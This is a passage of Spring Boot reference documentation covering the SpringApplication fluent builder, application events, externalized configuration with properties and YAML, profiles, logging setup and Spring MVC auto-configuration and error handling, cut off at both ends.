banner you would write:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication app = new SpringApplication(MySpringConfiguration.class);\n\t\tapp.setShowBanner(false);\n\t\tapp.run(args);\n\t}\n----\n\nNOTE: The constructor arguments passed to `SpringApplication` are configuration sources\nfor spring beans. In most cases these will be references to `@Configuration` classes, but\nthey could also be references to XML configuration or to packages that should be scanned.\n\nIt is also possible to configure the `SpringApplication` using an `application.properties`\nfile. See '<<boot-features-external-config>>' for details.\n\nFor a complete list of the configuration options, see the\n{dc-spring-boot}\/SpringApplication.{dc-ext}[`SpringApplication` Javadoc].\n\n\n\n[[boot-features-fluent-builder-api]]\n=== Fluent builder API\nIf you need to build an `ApplicationContext` hierarchy (multiple contexts with a\nparent\/child relationship), or if you just prefer using a '`fluent`' builder API, you\ncan use the `SpringApplicationBuilder`.\n\nThe `SpringApplicationBuilder` allows you to chain together multiple method calls, and\nincludes `parent` and `child` methods that allow you to create a hierarchy.\n\nFor example:\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.showBanner(false)\n\t\t.sources(Parent.class)\n\t\t.child(Application.class)\n\t\t.run(args);\n----\n\nNOTE: There are some restrictions when creating an `ApplicationContext` hierarchy, e.g.\nWeb components *must* be contained within the child context, and the same `Environment`\nwill be used for both parent and child contexts. See the\n{dc-spring-boot}\/builder\/SpringApplicationBuilder.{dc-ext}[`SpringApplicationBuilder` javadoc]\nfor full details.\n\n\n\n[[boot-features-application-events-and-listeners]]\n=== Application events and listeners\nIn addition to the usual Spring Framework events, such as\n{spring-javadoc}\/context\/event\/ContextRefreshedEvent.{dc-ext}[`ContextRefreshedEvent`],\na `SpringApplication` sends some additional application events. Some events are actually\ntriggered before the `ApplicationContext` is created.\n\nYou can register event listeners in a number of ways, the most common being\n`SpringApplication.addListeners(...)` method.\n\nApplication events are sent in the following order, as your application runs:\n\n. An `ApplicationStartedEvent` is sent at the start of a run, but before any\n processing except the registration of listeners and initializers.\n. An `ApplicationEnvironmentPreparedEvent` is sent when the `Environment` to be used in\n the context is known, but before the context is created.\n. An `ApplicationPreparedEvent` is sent just before the refresh is started, but after bean\n definitions have been loaded.\n. An `ApplicationFailedEvent` is sent if there is an exception on startup.\n\nTIP: You often won't need to use application events, but it can be handy to know that they\nexist. Internally, Spring Boot uses events to handle a variety of tasks.\n\n\n\n[[boot-features-web-environment]]\n=== Web environment\nA `SpringApplication` will attempt to create the right type of `ApplicationContext` on\nyour behalf. By default, an `AnnotationConfigApplicationContext` or\n`AnnotationConfigEmbeddedWebApplicationContext` will be used, depending on whether you\nare developing a web application or not.\n\nThe algorithm used to determine a '`web environment`' is fairly simplistic (based on the\npresence of a few classes). You can use `setWebEnvironment(boolean webEnvironment)` if\nyou need to override the default.\n\nIt is also possible to take complete control of the `ApplicationContext` type that will\nbe used by calling `setApplicationContextClass(...)`.\n\nTIP: It is often desirable to call `setWebEnvironment(false)` when using `SpringApplication`\nwithin a JUnit test.\n\n\n\n[[boot-features-command-line-runner]]\n=== Using the CommandLineRunner\nIf you want access to the raw command line arguments, or you need to run some specific code\nonce the `SpringApplication` has started you can implement the `CommandLineRunner`\ninterface. The `run(String... args)` method will be called on all Spring beans\nimplementing this interface.\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.*\n\timport org.springframework.stereotype.*\n\n\t@Component\n\tpublic class MyBean implements CommandLineRunner {\n\n\t public void run(String... args) {\n\t \/\/ Do something...\n\t }\n\n\t}\n----\n\nYou can additionally implement the `org.springframework.core.Ordered` interface or use the\n`org.springframework.core.annotation.Order` annotation if several `CommandLineRunner`\nbeans are defined that must be called in a specific order.\n\n\n\n[[boot-features-application-exit]]\n=== Application exit\nEach `SpringApplication` will register a shutdown hook with the JVM to ensure that the\n`ApplicationContext` is closed gracefully on exit. All the standard Spring lifecycle\ncallbacks (such as the `DisposableBean` interface, or the `@PreDestroy` annotation) can\nbe used.\n\nIn addition, beans may implement the `org.springframework.boot.ExitCodeGenerator`\ninterface if they wish to return a specific exit code when the application ends.\n\n\n\n[[boot-features-external-config]]\n== Externalized Configuration\nSpring Boot allows you to externalize your configuration so you can work with the same\napplication code in different environments. You can use properties files, YAML files,\nenvironment variables and command-line arguments to externalize configuration. Property\nvalues can be injected directly into your beans using the `@Value` annotation, accessed\nvia Spring's `Environment` abstraction or bound to structured objects.\n\nSpring Boot uses a very particular `PropertySource` order that is designed to allow\nsensible overriding of values, properties are considered in the the following order:\n\n. Command line arguments.\n. Java System properties (`System.getProperties()`).\n. OS environment variables.\n. JNDI attributes from `java:comp\/env`\n. A `RandomValuePropertySource` that only has properties in `+random.*+`.\n. Application properties outside of your packaged jar (`application.properties`\n including YAML and profile variants).\n. Application properties packaged inside your jar (`application.properties`\n including YAML and profile variants).\n. `@PropertySource` annotations on your `@Configuration` classes.\n. Default properties (specified using `SpringApplication.setDefaultProperties`).\n\nTo provide a concrete example, suppose you develop a `@Component` that uses a\n`name` property:\n\n[source,java,indent=0]\n----\n\timport org.springframework.stereotype.*\n\timport org.springframework.beans.factory.annotation.*\n\n\t@Component\n\tpublic class MyBean {\n\n\t @Value(\"${name}\")\n\t private String name;\n\n\t \/\/ ...\n\n\t}\n----\n\nYou can bundle an `application.properties` inside your jar that provides a sensible\ndefault `name`. When running in production, an `application.properties` can be provided\noutside of your jar that overrides `name`; and for one-off testing, you can launch with\na specific command line switch (e.g. `java -jar app.jar --name=\"Spring\"`).\n\nThe `RandomValuePropertySource` is useful for injecting random values (e.g. into secrets\nor test cases). It can produce integers, longs or strings, e.g.\n\n[source,properties,indent=0]\n----\n\tmy.secret=${random.value}\n\tmy.number=${random.int}\n\tmy.bignumber=${random.long}\n\tmy.number.less.than.ten=${random.int(10)}\n\tmy.number.in.range=${random.int[1024,65536]}\n----\n\nThe `+random.int*+` syntax is `OPEN value (,max) CLOSE` where the `OPEN,CLOSE` are any\ncharacter and `value,max` are integers. If `max` is provided then `value` is the minimum\nvalue and `max` is the maximum (exclusive).\n\n\n\n[[boot-features-external-config-command-line-args]]\n=== Accessing command line properties\nBy default `SpringApplication` will convert any command line option arguments (starting\nwith '`--`', e.g. `--server.port=9000`) to a `property` and add it to the Spring\n`Environment`. As mentioned above, command line properties always take precedence over\nother property sources.\n\nIf you don't want command line properties to be added to the `Environment` you can disable\nthem using `SpringApplication.setAddCommandLineProperties(false)`.\n\n\n\n[[boot-features-external-config-application-property-files]]\n=== Application property files\n`SpringApplication` will load properties from `application.properties` files in the\nfollowing locations and add them to the Spring `Environment`:\n\n. A `\/config` subdir of the current directory.\n. The current directory\n. A classpath `\/config` package\n. The classpath root\n\nThe list is ordered by precedence (locations higher in the list override lower items).\n\nNOTE: You can also <<boot-features-external-config-yaml, use YAML ('.yml') files>> as\nan alternative to '.properties'.\n\nIf you don't like `application.properties` as the configuration file name you can switch\nto another by specifying a `spring.config.name` environment property. You can also refer\nto an explicit location using the `spring.config.location` environment property\n(comma-separated list of directory locations, or file paths).\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.name=myproject\n----\n\nor\n\n[indent=0]\n----\n\t$ java -jar myproject.jar --spring.config.location=classpath:\/default.properties,classpath:\/override.properties\n----\n\nIf `spring.config.location` contains directories (as opposed to files) they should end\nin `\/` (and will be appended with the names generated from `spring.config.name` before\nbeing loaded). The default search path `classpath:,classpath:\/config,file:,file:config\/`\nis always used, irrespective of the value of `spring.config.location`. In that way you\ncan set up default values for your application in `application.properties` (or whatever\nother basename you choose with `spring.config.name`) and override it at runtime with a\ndifferent file, keeping the defaults.\n\nNOTE: If you use environment variables rather than system properties, most operating\nsystems disallow period-separated key names, but you can use underscores instead (e.g.\n`SPRING_CONFIG_NAME` instead of `spring.config.name`).\n\nNOTE: If you are running in a container then JNDI properties (in `java:comp\/env`) or\nservlet context initialization parameters can be used instead of, or as well as,\nenvironment variables or system properties.\n\n\n\n[[boot-features-external-config-profile-specific-properties]]\n=== Profile specific properties\nIn addition to `application.properties` files, profile specific properties can also be\ndefined using the naming convention `application-{profile}.properties`.\n\nProfile specific properties are loaded from the same locations as standard\n`application.properties`, with profile specific files overriding the default ones.\n\n\n\n[[boot-features-external-config-placeholders-in-properties]]\n=== Placeholders in properties\nThe values in `application.properties` are filtered through the existing `Environment`\nwhen they are used so you can refer back to previously defined values (e.g. from System\nproperties).\n\n[source,properties,indent=0]\n----\n\tapp.name=MyApp\n\tapp.description=${app.name} is a Spring Boot application\n----\n\nTIP: You can also use this technique to create '`short`' variants of existing Spring Boot\nproperties. See the '<<howto.adoc#howto-use-short-command-line-arguments>>' how-to\nfor details.\n\n\n\n[[boot-features-external-config-yaml]]\n=== Using YAML instead of Properties\nhttp:\/\/yaml.org[YAML] is a superset of JSON, and as such is a very convenient format\nfor specifying hierarchical configuration data. The `SpringApplication` class will\nautomatically support YAML as an alternative to properties whenever you have the\nhttp:\/\/code.google.com\/p\/snakeyaml\/[SnakeYAML] library on your classpath.\n\nNOTE: If you use '`starter POMs`' SnakeYAML will be automatically provided via\n`spring-boot-starter`.\n\n\n\n[[boot-features-external-config-loading-yaml]]\n==== Loading YAML\nSpring Boot provides two convenient classes that can be used to load YAML documents. The\n`YamlPropertiesFactoryBean` will load YAML as `Properties` and the `YamlMapFactoryBean`\nwill load YAML as a `Map`.\n\nFor example, the following YAML document:\n\n[source,yaml,indent=0]\n----\n\tenvironments:\n\t\tdev:\n\t\t\turl: http:\/\/dev.bar.com\n\t\t\tname: Developer Setup\n\t\tprod:\n\t\t\turl: http:\/\/foo.bar.com\n\t\t\tname: My Cool App\n----\n\nWould be transformed into these properties:\n\n[source,properties,indent=0]\n----\n\tenvironments.dev.url=http:\/\/dev.bar.com\n\tenvironments.dev.name=Developer Setup\n\tenvironments.prod.url=http:\/\/foo.bar.com\n\tenvironments.prod.name=My Cool App\n----\n\nYAML lists are represented as property keys with `[index]` dereferencers,\nfor example this YAML:\n\n[source,yaml,indent=0]\n----\n\t my:\n\t\tservers:\n\t\t\t- dev.bar.com\n\t\t\t- foo.bar.com\n----\n\nWould be transformed into these properties:\n\n[source,properties,indent=0]\n----\n\tmy.servers[0]=dev.bar.com\n\tmy.servers[1]=foo.bar.com\n----\n\nTo bind to properties like that using the Spring `DataBinder` utilities (which is what\n`@ConfigurationProperties` does) you need to have a property in the target bean of type\n`java.util.List` (or `Set`) and you either need to provide a setter, or initialize it\nwith a mutable value, e.g. this will bind to the properties above\n\n[source,java,indent=0]\n----\n\t@ConfigurationProperties(prefix=\"my\")\n\tpublic class Config {\n\t\tprivate List<String> servers = new ArrayList<String>();\n\n\t\tpublic List<String> getServers() {\n\t\t\treturn this.servers;\n\t\t}\n\t}\n----\n\n\n\n[[boot-features-external-config-exposing-yaml-to-spring]]\n==== Exposing YAML as properties in the Spring Environment\nThe `YamlPropertySourceLoader` class can be used to expose YAML as a `PropertySource`\nin the Spring `Environment`. This allows you to use the familiar `@Value` annotation with\nplaceholders syntax to access YAML properties.\n\n\n\n[[boot-features-external-config-multi-profile-yaml]]\n==== Multi-profile YAML documents\nYou can specify multiple profile-specific YAML documents in a single file by\nusing a `spring.profiles` key to indicate when the document applies. For example:\n\n[source,yaml,indent=0]\n----\n\tserver:\n\t\taddress: 192.168.1.100\n\t---\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\taddress: 127.0.0.1\n\t---\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\taddress: 192.168.1.120\n----\n\nIn the example above, the `server.address` property will be `127.0.0.1` if the\n`development` profile is active. If the `development` and `production` profiles are *not*\nenabled, then the value for the property will be `192.168.1.100`\n\n\n\n[[boot-features-external-config-yaml-shortcomings]]\n==== YAML shortcomings\nYAML files can't be loaded via the `@PropertySource` annotation. So in the\ncase that you need to load values that way, you need to use a properties file.\n\n\n\n[[boot-features-external-config-typesafe-configuration-properties]]\n=== Typesafe Configuration Properties\nUsing the `@Value(\"${property}\")` annotation to inject configuration properties can\nsometimes be cumbersome, especially if you are working with multiple properties or\nyour data is hierarchical in nature. Spring Boot provides an alternative method\nof working with properties that allows strongly typed beans to govern and validate\nthe configuration of your application. For example:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\tprivate String username;\n\n\t\tprivate InetAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t}\n----\n\nWhen the `@EnableConfigurationProperties` annotation is applied to your `@Configuration`,\nany beans annotated with `@ConfigurationProperties` will be automatically configured\nfrom the `Environment` properties. This style of configuration works particularly well\nwith the `SpringApplication` external YAML configuration:\n\n[source,yaml,indent=0]\n----\n\t# application.yml\n\n\tconnection:\n\t\tusername: admin\n\t\tremoteAddress: 192.168.1.1\n\n\t# additional configuration as required\n----\n\nTo work with `@ConfigurationProperties` beans you can just inject them in the same way\nas any other bean.\n\n[source,java,indent=0]\n----\n\t@Service\n\tpublic class MyService {\n\n\t\t@Autowired\n\t\tprivate ConnectionSettings connection;\n\n\t \t\/\/...\n\n\t\t@PostConstruct\n\t\tpublic void openConnection() {\n\t\t\tServer server = new Server();\n\t\t\tthis.connection.configure(server);\n\t\t}\n\n\t}\n----\n\nIt is also possible to shortcut the registration of `@ConfigurationProperties` bean\ndefinitions by simply listing the properties classes directly in the\n`@EnableConfigurationProperties` annotation:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@EnableConfigurationProperties(ConnectionSettings.class)\n\tpublic class MyConfiguration {\n\t}\n----\n\n\n\n[[boot-features-external-config-relaxed-binding]]\n==== Relaxed binding\nSpring Boot uses some relaxed rules for binding `Environment` properties to\n`@ConfigurationProperties` beans, so there doesn't need to be an exact match between\nthe `Environment` property name and the bean property name. Common examples where this\nis useful include underscore separated (e.g. `context_path` binds to `contextPath`), and\ncapitalized (e.g. `PORT` binds to `port`) environment properties.\n\nSpring will attempt to coerce the external application properties to the right type when\nit binds to the `@ConfigurationProperties` beans. If you need custom type conversion you\ncan provide a `ConversionService` bean (with bean id `conversionService`) or custom\nproperty editors (via a `CustomEditorConfigurer` bean).\n\n\n\n[[boot-features-external-config-validation]]\n==== @ConfigurationProperties Validation\nSpring Boot will attempt to validate external configuration, by default using JSR-303\n(if it is on the classpath). You can simply add JSR-303 `javax.validation` constraint\nannotations to your `@ConfigurationProperties` class:\n\n[source,java,indent=0]\n----\n\t@Component\n\t@ConfigurationProperties(prefix=\"connection\")\n\tpublic class ConnectionSettings {\n\n\t\t@NotNull\n\t\tprivate InetAddress remoteAddress;\n\n\t\t\/\/ ... getters and setters\n\n\t}\n----\n\nYou can also add a custom Spring `Validator` by creating a bean definition called\n`configurationPropertiesValidator`.\n\nTIP: The `spring-boot-actuator` module includes an endpoint that exposes all\n`@ConfigurationProperties` beans. Simply point your web browser to `\/configprops`\nor use the equivalent JMX endpoint. See the\n'<<production-ready-features.adoc#production-ready-endpoints, Production ready features>>'.\nsection for details.\n\n\n[[boot-features-profiles]]\n== Profiles\nSpring Profiles provide a way to segregate parts of your application configuration and\nmake it only available in certain environments. Any `@Component` or `@Configuration` can\nbe marked with `@Profile` to limit when it is loaded:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@Profile(\"production\")\n\tpublic class ProductionConfiguration {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIn the normal Spring way, you can use a `spring.profiles.active`\n`Environment` property to specify which profiles are active. You can\nspecify the property in any of the usual ways, for example you could\ninclude it in your `application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.profiles.active=dev,hsqldb\n----\n\nor specify on the command line using the switch `--spring.profiles.active=dev,hsqldb`.\n\n\n\n[[boot-features-adding-active-profiles]]\n=== Adding active profiles\nThe `spring.profiles.active` property follows the same ordering rules as other\nproperties, the highest `PropertySource` will win. This means that you can specify\nactive profiles in `application.properties` then *replace* them using the command line\nswitch.\n\nSometimes it is useful to have profile specific properties that *add* to the active\nprofiles rather than replace them. The `spring.profiles.include` property can be used\nto unconditionally add active profiles. The `SpringApplication` entry point also has\na Java API for setting additional profiles (i.e. on top of those activated by the\n`spring.profiles.active` property): see the `setAdditionalProfiles()` method.\n\nFor example, when an application with following properties is run using the switch\n`--spring.profiles.active=prod` the `proddb` and `prodmq` profiles will also be activated:\n\n[source,yaml,indent=0]\n----\n\t---\n\tmy.property: fromyamlfile\n\t---\n\tspring.profiles: prod\n\tspring.profiles.include: proddb,prodmq\n----\n\nNOTE: Remember that the `spring.profiles` property can be defined in a YAML document\nto determine when this particular document is included in the configuration. See\n<<howto-change-configuration-depending-on-the-environment>> for more details.\n\n\n\n[[boot-features-programmatically-setting-profiles]]\n=== Programmatically setting profiles\nYou can programmatically set active profiles by calling\n`SpringApplication.setAdditionalProfiles(...)` before your application runs. It is also\npossible to activate profiles using Spring's `ConfigurableEnvironment` interface.\n\n\n\n[[boot-features-profile-specific-configuration]]\n=== Profile specific configuration files\nProfile specific variants of both `application.properties` (or `application.yml`) and\nfiles referenced via `@ConfigurationProperties` are considered as files are loaded.\nSee '<<boot-features-external-config-profile-specific-properties>>' for details.\n\n\n\n[[boot-features-logging]]\n== Logging\nSpring Boot uses http:\/\/commons.apache.org\/logging[Commons Logging] for all internal\nlogging, but leaves the underlying log implementation open. Default configurations are\nprovided for\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/logging\/package-summary.html[Java Util Logging],\nhttp:\/\/logging.apache.org\/log4j\/[Log4J] and\nhttp:\/\/logback.qos.ch\/[Logback].\nIn each case there is console output and file output (rotating, 10 Mb file size).\n\nBy default, If you use the '`Starter POMs`', Logback will be used for logging. Appropriate\nLogback routing is also included to ensure that dependent libraries that use\nJava Util Logging, Commons Logging, Log4J or SLF4J will all work correctly.\n\nTIP: There are a lot of logging frameworks available for Java. Don't worry if the above\nlist seems confusing. Generally you won't need to change your logging dependencies and\nthe Spring Boot defaults will work just fine.\n\n\n\n[[boot-features-logging-format]]\n=== Log format\nThe default log output from Spring Boot looks like this:\n\n[indent=0]\n----\n2014-03-05 10:57:51.112 INFO 45469 --- [ main] org.apache.catalina.core.StandardEngine : Starting Servlet Engine: Apache Tomcat\/7.0.52\n2014-03-05 10:57:51.253 INFO 45469 --- [ost-startStop-1] o.a.c.c.C.[Tomcat].[localhost].[\/] : Initializing Spring embedded WebApplicationContext\n2014-03-05 10:57:51.253 INFO 45469 --- [ost-startStop-1] o.s.web.context.ContextLoader : Root WebApplicationContext: initialization completed in 1358 ms\n2014-03-05 10:57:51.698 INFO 45469 --- [ost-startStop-1] o.s.b.c.e.ServletRegistrationBean : Mapping servlet: 'dispatcherServlet' to [\/]\n2014-03-05 10:57:51.702 INFO 45469 --- [ost-startStop-1] o.s.b.c.embedded.FilterRegistrationBean : Mapping filter: 'hiddenHttpMethodFilter' to: [\/*]\n----\n\nThe following items are output:\n\n* Date and Time -- Millisecond precision and easily sortable.\n* Log Level -- `ERROR`, `WARN`, `INFO`, `DEBUG` or `TRACE`.\n* Process ID.\n* A `---` separator to distinguish the start of actual log messages.\n* Logger name -- This is usually the source class name (often abbreviated).\n* The log message.\n\n\n\n[[boot-features-logging-console-output]]\n=== Console output\nThe default log configuration will echo messages to the console as they are written. By\ndefault `ERROR`, `WARN` and `INFO` level messages are logged. To also log `DEBUG` level\nmessages to the console you can start your application with a `--debug` flag.\n\n[indent=0]\n----\n\t$ java -jar myapp.jar --debug\n----\n\nIf your terminal supports ANSI, color output will be used to aid readability. You can set\n`spring.output.ansi.enabled` to a\n{dc-spring-boot}\/ansi\/AnsiOutput.Enabled.{dc-ext}[supported value] to override the auto\ndetection.\n\n\n\n[[boot-features-logging-file-output]]\n=== File output\nBy default, log files are written to `spring.log` in your `temp` directory and rotate at\n10 Mb. You can easily customize the output folder by setting the `logging.path` property\n(for example in your `application.properties`). It is also possible to change the filename\nusing a `logging.file` property. Note that if `logging.file` is used, then setting `logging.path` has no effect.\n\nAs with console output, `ERROR`, `WARN` and `INFO` level messages are logged by default.\n\n[[boot-features-custom-log-levels]]\n=== Log Levels\n\nAll the supported logging systems can have the logger levels set in the Spring\n`Environment` (so for example in `application.properties`) using '`+logging.level.*=LEVEL+`'\nwhere '`LEVEL`' is one of TRACE, DEBUG, INFO, WARN, ERROR, FATAL, OFF. Example\n`application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tlogging.level.org.springframework.web: DEBUG\n\tlogging.level.org.hibernate: ERROR\n----\n\n\n\n[[boot-features-custom-log-configuration]]\n=== Custom log configuration\n\nThe various logging systems can be activated by including the appropriate libraries on\nthe classpath, and further customized by providing a suitable configuration file in the\nroot of the classpath, or in a location specified by the Spring `Environment` property\n`logging.config`. (Note however that since logging is initialized *before* the\n`ApplicationContext` is created, it isn't possible to control logging from\n`@PropertySources` in Spring `@Configuration` files. System properties and the\nconventional Spring Boot external configuration files work just fine.)\n\nDepending on your logging system, the following files will be loaded:\n\n|===\n|Logging System |Customization\n\n|Logback\n|`logback.xml`\n\n|Log4j\n|`log4j.properties` or `log4j.xml`\n\n|JDK (Java Util Logging)\n|`logging.properties`\n|===\n\nTo help with the customization some other properties are transferred from the Spring\n`Environment` to System properties:\n\n|===\n|Spring Environment |System Property |Comments\n\n|`logging.file`\n|`LOG_FILE`\n|Used in default log configuration if defined.\n\n|`logging.path`\n|`LOG_PATH`\n|Used in default log configuration if defined.\n\n|`PID`\n|`PID`\n|The current process ID (discovered if possible and when not already defined as an OS\n environment variable).\n|===\n\nAll the logging systems supported can consult System properties when parsing their\nconfiguration files. See the default configurations in `spring-boot.jar` for examples.\n\nWARNING: There are know classloading issues with Java Util Logging that cause problems\nwhen running from an '`executable jar`'. We recommend that you avoid it if at all\npossible.\n\n\n\n[[boot-features-developing-web-applications]]\n== Developing web applications\nSpring Boot is well suited for web application development. You can easily create a\nself-contained HTTP server using embedded Tomcat or Jetty. Most web applications will\nuse the `spring-boot-starter-web` module to get up and running quickly.\n\nIf you haven't yet developed a Spring Boot web application you can follow the\n\"Hello World!\" example in the\n'<<getting-started.adoc#getting-started-first-application, Getting started>>' section.\n\n\n\n[[boot-features-spring-mvc]]\n=== The '`Spring Web MVC framework`'\nThe Spring Web MVC framework (often referred to as simply '`Spring MVC`') is a rich\n'`model view controller`' web framework. Spring MVC lets you create special `@Controller`\nor `@RestController` beans to handle incoming HTTP requests. Methods in your controller\nare mapped to HTTP using `@RequestMapping` annotations.\n\nHere is a typical example `@RestController` to serve JSON data:\n\n[source,java,indent=0]\n----\n\t@RestController\n\t@RequestMapping(value=\"\/users\")\n\tpublic class MyRestController {\n\n\t\t@RequestMapping(value=\"\/{user}\", method=RequestMethod.GET)\n\t\tpublic User getUser(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t@RequestMapping(value=\"\/{user}\/customers\", method=RequestMethod.GET)\n\t\tList<Customer> getUserCustomers(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t@RequestMapping(value=\"\/{user}\", method=RequestMethod.DELETE)\n\t\tpublic User deleteUser(@PathVariable Long user) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nSpring MVC is part of the core Spring Framework and detailed information is available in\nthe {spring-reference}#mvc[reference documentation]. There are also several guides\navailable at http:\/\/spring.io\/guides that cover Spring MVC.\n\n\n\n[[boot-features-spring-mvc-auto-configuration]]\n==== Spring MVC auto-configuration\nSpring Boot provides auto-configuration for Spring MVC that works well with most\napplications.\n\nThe auto-configuration adds the following features on top of Spring's defaults:\n\n* Inclusion of `ContentNegotiatingViewResolver` and `BeanNameViewResolver` beans.\n* Support for serving static resources, including support for WebJars (see below).\n* Automatic registration of `Converter`, `GenericConverter`, `Formatter` beans.\n* Support for `HttpMessageConverters` (see below).\n* Automatic registration of `MessageCodeResolver` (see below)\n* Static `index.html` support.\n* Custom `Favicon` support.\n\nIf you want to take complete control of Spring MVC, you can add your own `@Configuration`\nannotated with `@EnableWebMvc`. If you want to keep Spring Boot MVC features, and\nyou just want to add additional {spring-reference}#mvc[MVC configuration] (interceptors,\nformatters, view controllers etc.) you can add your own `@Bean` of type\n`WebMvcConfigurerAdapter`, but *without* `@EnableWebMvc`.\n\n\n\n[[boot-features-spring-mvc-message-converters]]\n==== HttpMessageConverters\nSpring MVC uses the `HttpMessageConverter` interface to convert HTTP requests and\nresponses. Sensible defaults are included out of the box, for example Objects can be\nautomatically converted to JSON (using the Jackson library) or XML (using the Jackson\nXML extension if available, else using JAXB).\n\nIf you need to add or customize converters you can use Spring Boot's\n`HttpMessageConverters` class:\n[source,java,indent=0]\n----\n\timport org.springframework.boot.autoconfigure.web.HttpMessageConverters;\n\timport org.springframework.context.annotation.*;\n\timport org.springframework.http.converter.*;\n\n\t@Configuration\n\tpublic class MyConfiguration {\n\n\t\t@Bean\n\t\tpublic HttpMessageConverters customConverters() {\n\t\t\tHttpMessageConverter<?> additional = ...\n\t\t\tHttpMessageConverter<?> another = ...\n\t\t\treturn new HttpMessageConverters(additional, another);\n\t\t}\n\n\t}\n----\n\n[[boot-features-spring-message-codes]]\n==== MessageCodesResolver\nSpring MVC has a strategy for generating error codes for rendering error messages\nfrom binding errors: `MessageCodesResolver`. Spring Boot will create one for you if\nyou set the `spring.mvc.message-codes-resolver.format` property `PREFIX_ERROR_CODE` or\n`POSTFIX_ERROR_CODE` (see the enumeration in `DefaultMessageCodesResolver.Format`).\n\n\n\n[[boot-features-spring-mvc-static-content]]\n==== Static Content\nBy default Spring Boot will serve static content from a folder called `\/static` (or\n`\/public` or `\/resources` or `\/META-INF\/resources`) in the classpath or from the root\nof the `ServletContext`. It uses the `ResourceHttpRequestHandler` from Spring MVC so you\ncan modify that behavior by adding your own `WebMvcConfigurerAdapter` and overriding the\n`addResourceHandlers` method.\n\nIn a stand-alone web application the default servlet from the container is also\nenabled, and acts as a fallback, serving content from the root of the `ServletContext` if\nSpring decides not to handle it. Most of the time this will not happen (unless you modify\nthe default MVC configuration) because Spring will always be able to handle requests\nthrough the `DispatcherServlet`.\n\nIn addition to the '`standard`' static resource locations above, a special case is made for\nhttp:\/\/www.webjars.org\/[Webjars content]. Any resources with a path in `+\/webjars\/**+` will\nbe served from jar files if they are packaged in the Webjars format.\n\nTIP: Do not use the `src\/main\/webapp` folder if your application will be packaged as a\njar. Although this folder is a common standard, it will *only* work with war packaging\nand it will be silently ignored by most build tools if you generate a jar.\n\n\n\n[[boot-features-spring-mvc-template-engines]]\n==== Template engines\n\nAs well as REST web services, you can also use Spring MVC to serve dynamic HTML content.\nSpring MVC supports a variety of templating technologies including Velocity, FreeMarker\nand JSPs. Many other templating engines also ship their own Spring MVC integrations.\n\nSpring Boot includes auto-configuration support for the following templating engines:\n\n * http:\/\/freemarker.org\/docs\/[FreeMarker]\n * http:\/\/beta.groovy-lang.org\/docs\/groovy-2.3.0\/html\/documentation\/markup-template-engine.html[Groovy]\n * http:\/\/www.thymeleaf.org[Thymeleaf]\n * http:\/\/velocity.apache.org[Velocity]\n\nWhen you're using one of these templating engines with the default configuration, your\ntemplates will be picked up automatically from `src\/main\/resources\/templates`.\n\nTIP: JSPs should be avoided if possible, there are several\n<<boot-features-jsp-limitations, known limitations>> when using them with embedded\nservlet containers.\n\n\n\n[[boot-features-error-handling]]\n==== Error Handling\nSpring Boot provides an `\/error` mapping by default that handles all errors in a\nsensible way, and it is registered as a '`global`' error page in the servlet container.\nFor machine clients it will produce a JSON response with details of the error, the HTTP\nstatus and the exception message. For browser clients there is a '`whitelabel`' error\nview that renders the same data in HTML format (to customize it just add a `View` that\nresolves to '`error`'). To replace the default behaviour completely you can implement\n`ErrorController` and register a bean definition of that type, or simply add a bean\nof type `ErrorAttributes` to use the existing mechanism but replace the contents.\n\nIf you want more specific error pages for some conditions, the embedded servlet containers\nsupport a uniform Java DSL for customizing the error handling. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerCustomizer containerCustomizer(){\n\t\treturn new MyCustomizer();\n\t}\n\n\t\/\/ ...\n\n\tprivate static class MyCustomizer implements EmbeddedServletContainerCustomizer {\n\n\t\t@Override\n\t\tpublic void customize(ConfigurableEmbeddedServletContainer container) {\n\t\t\tcontainer.addErrorPages(new ErrorPage(HttpStatus.BAD_REQUEST, \"\/400\"));\n\t\t}\n\n\t}\n----\n\nYou can also use regular Spring MVC features like\n{spring-reference}\/#mvc-exceptionhandlers[`@ExceptionHandler` methods] and\n{spring-reference}\/#mvc-ann-controller-advice[`@ControllerAdvice`]. The `ErrorController`\nwill then pick up any unhandled exceptions.\n\nN.B. if you register an `ErrorPage` with a path that will end up being handled by a\n`Filter` (e.g. as is common with some non-Spring web frameworks, like Jersey and Wicket),\nthen the `Filter` has to be explicitly registered as an `ERROR` dispatcher, e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean myFilter() {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean();\n\t\tregistration.setFilter(new MyFilter());\n\t\t...\n\t\tregistration.setDispatcherTypes(EnumSet.allOf(DispatcherType.class));\n\t\treturn registration;\n\t}\n----\n\n(the default `FilterRegistrationBean` does not include the `ERROR` dispatcher type).\n\n[[boot-features-error-handling-websphere]]\n===== Error Handling on WebSphere Application Server\nWhen deployed to a servlet container, a Spring Boot uses its error page filter to\nforward a request with an error status to the appropriate error page. The request can\nonly be forwarded to the correct error page if the response has not already been\ncommitted. By default, WebSphere Application Server 8.0 and later commits the response\nupon successful completion of a servlet's service method. You should disable this\nbehaviour by setting `com.ibm.ws.webcontainer.invokeFlushAfterService` to `false`\n\n\n\n[[boot-features-jersey]]\n=== JAX-RS and Jersey\nIf you prefer the 